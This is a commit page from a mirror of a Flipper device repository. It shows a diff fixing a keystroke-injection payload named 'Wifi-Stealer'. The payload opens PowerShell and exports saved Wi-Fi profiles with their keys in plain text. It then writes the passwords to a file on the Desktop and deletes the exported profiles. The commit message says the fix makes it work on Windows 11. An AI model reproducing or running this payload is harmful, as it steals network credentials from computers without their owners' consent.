mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-03 04:10:27 +00:00
Updated Wifi-Stealer_ORG.txt
When outputting the file it saves as Wifi not Wi-Fi- and does not output to 0.txt, simply removing the dash - between Wifi makes this then work as intended. Tested and working on Windows 11.
This commit is contained in:
parent
945362d3a8
commit
9e052a9d72
@ -9,5 +9,5 @@ DELAY 500
|
|||||||
STRING powershell
|
STRING powershell
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path WiFi-* -Pattern 'keyMaterial'>0.txt;del WiFi-*;exit
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user